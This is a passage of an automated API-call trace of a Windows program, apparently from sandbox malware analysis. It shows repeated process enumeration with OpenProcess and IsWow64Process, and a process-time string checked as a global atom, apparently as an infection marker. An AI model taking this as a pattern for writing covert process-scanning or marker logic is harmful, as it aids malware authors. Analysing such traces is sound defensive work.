	[0099.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x38c
	[0099.678] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.678] CloseHandle (hObject=0x38c) returned 1
	[0099.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x38c
	[0099.678] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.678] CloseHandle (hObject=0x38c) returned 1
	[0099.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x38c
	[0099.678] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.678] CloseHandle (hObject=0x38c) returned 1
	[0099.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x38c
	[0099.678] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.678] CloseHandle (hObject=0x38c) returned 1
	[0099.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x38c
	[0099.678] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.678] CloseHandle (hObject=0x38c) returned 1
	[0099.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x38c
	[0099.679] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.679] CloseHandle (hObject=0x38c) returned 1
	[0099.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x38c
	[0099.679] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.679] CloseHandle (hObject=0x38c) returned 1
	[0099.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x38c
	[0099.679] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.679] CloseHandle (hObject=0x38c) returned 1
	[0099.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x38c
	[0099.679] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.679] CloseHandle (hObject=0x38c) returned 1
	[0099.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x38c
	[0099.679] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.679] CloseHandle (hObject=0x38c) returned 1
	[0099.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x38c
	[0099.680] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.680] CloseHandle (hObject=0x38c) returned 1
	[0099.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x38c
	[0099.680] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0099.680] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0099.680] GetProcessTimes (in: hProcess=0x38c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0099.680] wsprintfA (in: param_1=0x679720, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0099.681] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0099.681] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0099.681] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0099.681] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0099.681] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0099.681] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0099.681] CloseHandle (hObject=0x38c) returned 1
	[0099.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0099.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x38c
	[0099.682] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.682] CloseHandle (hObject=0x38c) returned 1
	[0099.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x38c
	[0099.682] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.682] CloseHandle (hObject=0x38c) returned 1
	[0099.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0099.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0099.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0099.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0099.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0099.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0099.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0099.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0099.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0099.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0099.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0099.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0099.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0099.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0099.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0099.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0099.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0099.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0099.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x394
	[0099.772] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.772] CloseHandle (hObject=0x394) returned 1
	[0099.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0099.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0099.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x394
	[0099.773] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.773] CloseHandle (hObject=0x394) returned 1
	[0099.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0099.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x394
	[0099.773] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.773] CloseHandle (hObject=0x394) returned 1
	[0099.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x394
	[0099.773] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.773] CloseHandle (hObject=0x394) returned 1
	[0099.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x394
	[0099.773] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.773] CloseHandle (hObject=0x394) returned 1
	[0099.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x394
	[0099.774] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.774] CloseHandle (hObject=0x394) returned 1
	[0099.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x394
	[0099.774] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.774] CloseHandle (hObject=0x394) returned 1
	[0099.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x394
	[0099.774] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.774] CloseHandle (hObject=0x394) returned 1
	[0099.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0099.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x394
	[0099.774] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.774] CloseHandle (hObject=0x394) returned 1
	[0099.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x394
	[0099.775] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.775] CloseHandle (hObject=0x394) returned 1
	[0099.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x394
	[0099.775] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.775] CloseHandle (hObject=0x394) returned 1
	[0099.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x394
	[0099.775] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.775] CloseHandle (hObject=0x394) returned 1
	[0099.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x394
	[0099.775] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.775] CloseHandle (hObject=0x394) returned 1
	[0099.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x394
	[0099.775] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.775] CloseHandle (hObject=0x394) returned 1
	[0099.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x394
	[0099.776] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.776] CloseHandle (hObject=0x394) returned 1
	[0099.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x394
	[0099.776] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.776] CloseHandle (hObject=0x394) returned 1
	[0099.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x394
	[0099.776] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.776] CloseHandle (hObject=0x394) returned 1
	[0099.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x394
	[0099.776] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.776] CloseHandle (hObject=0x394) returned 1
	[0099.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x394
	[0099.776] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.776] CloseHandle (hObject=0x394) returned 1
	[0099.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x394
	[0099.777] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.777] CloseHandle (hObject=0x394) returned 1
	[0099.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x394
	[0099.777] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.777] CloseHandle (hObject=0x394) returned 1
	[0099.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x394
	[0099.777] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.777] CloseHandle (hObject=0x394) returned 1
	[0099.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x394
	[0099.777] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.777] CloseHandle (hObject=0x394) returned 1
	[0099.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x394
	[0099.777] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.777] CloseHandle (hObject=0x394) returned 1
	[0099.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x394
	[0099.778] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.778] CloseHandle (hObject=0x394) returned 1
	[0099.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x394
	[0099.778] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.778] CloseHandle (hObject=0x394) returned 1
	[0099.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x394
	[0099.778] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.778] CloseHandle (hObject=0x394) returned 1
	[0099.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x394
	[0099.778] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.778] CloseHandle (hObject=0x394) returned 1
	[0099.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x394
	[0099.778] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.778] CloseHandle (hObject=0x394) returned 1
	[0099.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x394
	[0099.778] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.779] CloseHandle (hObject=0x394) returned 1
	[0099.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x394
	[0099.779] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.779] CloseHandle (hObject=0x394) returned 1
	[0099.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x394
	[0099.779] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0099.779] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0099.779] GetProcessTimes (in: hProcess=0x394, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0099.779] wsprintfA (in: param_1=0x67e9c8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0099.780] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0099.780] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0099.780] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0099.780] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0099.780] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0099.780] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0099.780] CloseHandle (hObject=0x394) returned 1
	[0099.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0099.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x394
	[0099.781] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.781] CloseHandle (hObject=0x394) returned 1
	[0099.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x394
	[0099.781] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.781] CloseHandle (hObject=0x394) returned 1
	[0099.925] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0099.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0099.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0099.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0099.927] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0099.927] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0099.927] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0099.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0099.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0099.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0099.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0099.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0099.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0099.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0099.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0099.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0099.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0099.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0099.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x394
	[0099.930] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.930] CloseHandle (hObject=0x394) returned 1
	[0099.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0099.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0099.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x394
	[0099.930] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.930] CloseHandle (hObject=0x394) returned 1
	[0099.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0099.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x394
	[0099.931] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.931] CloseHandle (hObject=0x394) returned 1
	[0099.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x394
	[0099.931] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.931] CloseHandle (hObject=0x394) returned 1
	[0099.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x394
	[0099.931] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.931] CloseHandle (hObject=0x394) returned 1
	[0099.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x394
	[0099.931] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.931] CloseHandle (hObject=0x394) returned 1
	[0099.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x394
	[0099.932] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.932] CloseHandle (hObject=0x394) returned 1
	[0099.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x394
	[0099.932] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.932] CloseHandle (hObject=0x394) returned 1
	[0099.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0099.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x394
	[0099.932] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.932] CloseHandle (hObject=0x394) returned 1
	[0099.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x394
	[0099.932] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.932] CloseHandle (hObject=0x394) returned 1
	[0099.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x394
	[0099.932] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.933] CloseHandle (hObject=0x394) returned 1
	[0099.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x394
	[0099.933] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.933] CloseHandle (hObject=0x394) returned 1
	[0099.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x394
	[0099.933] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.933] CloseHandle (hObject=0x394) returned 1
	[0099.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x394
	[0099.933] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.933] CloseHandle (hObject=0x394) returned 1
	[0099.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x394
	[0099.933] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.933] CloseHandle (hObject=0x394) returned 1
	[0099.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x394
	[0099.933] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.934] CloseHandle (hObject=0x394) returned 1
	[0099.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x394
	[0099.934] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.934] CloseHandle (hObject=0x394) returned 1
	[0099.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x394
	[0099.934] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.934] CloseHandle (hObject=0x394) returned 1
	[0099.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x394
	[0099.934] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.934] CloseHandle (hObject=0x394) returned 1
	[0099.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x394
	[0099.934] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.934] CloseHandle (hObject=0x394) returned 1
	[0099.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x394
	[0099.935] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.935] CloseHandle (hObject=0x394) returned 1
	[0099.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x394
	[0099.935] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.935] CloseHandle (hObject=0x394) returned 1
	[0099.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x394
	[0099.935] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.935] CloseHandle (hObject=0x394) returned 1
	[0099.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x394
	[0099.935] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.935] CloseHandle (hObject=0x394) returned 1
	[0099.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x394
	[0099.935] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.935] CloseHandle (hObject=0x394) returned 1
	[0099.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x394
	[0099.936] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.936] CloseHandle (hObject=0x394) returned 1
	[0099.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x394
	[0099.936] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.936] CloseHandle (hObject=0x394) returned 1
	[0099.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x394
	[0099.936] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.936] CloseHandle (hObject=0x394) returned 1
	[0099.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x394
	[0099.936] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.936] CloseHandle (hObject=0x394) returned 1
